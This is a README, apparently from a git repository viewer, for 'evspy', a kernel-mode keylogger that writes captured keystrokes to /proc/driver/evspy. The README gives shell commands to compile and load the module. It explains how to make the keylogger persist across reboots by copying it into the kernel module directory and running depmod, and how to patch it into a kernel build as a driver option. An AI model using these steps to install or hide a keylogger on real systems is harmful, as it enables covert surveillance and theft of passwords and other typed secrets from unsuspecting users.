blob: 74e4664df06d0e214022407b8a36df6ffc23f0a4 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
|
Evspy is a general purpose kernel-mode keylogger in (early) development stage.
The file from where you can read the registered keystrokes is /proc/driver/evspy
by default. Only root can read it. Beware users: evspy can troll you.
Don't be evil.
** COMPILE **
$ make
** LOAD **
# insmod evspy.ko
** UNLOAD **
# rmmod evspy
** IS IT ALREADY LOADED? **
$ lsmod | grep evspy
** PERSISTENCE **
If you want evspy to be loaded every time system boots, copy it into your
kernel module dir:
# cp evspy.ko /lib/modules/$(uname -r)/kernel/drivers/input/evspy.ko
and update module database:
# depmod -a
(In some distros it could also be necessary to add it to some rc/config file)
Once it has been installed, you can load it when you want with
# modprobe evspy
** OTHER **
A patch is supplied (evspy.patch) to be able to compile a kernel with evspy
included; just cd to your Linux source tree, copy all the evspy files
(*.c *.h maps khm) to drivers/input/, and apply the patch.
Then you should be able to configure the kernel to include evspy just like
any other module:
Device Drivers --> Input device support --> Event based keylogger
|
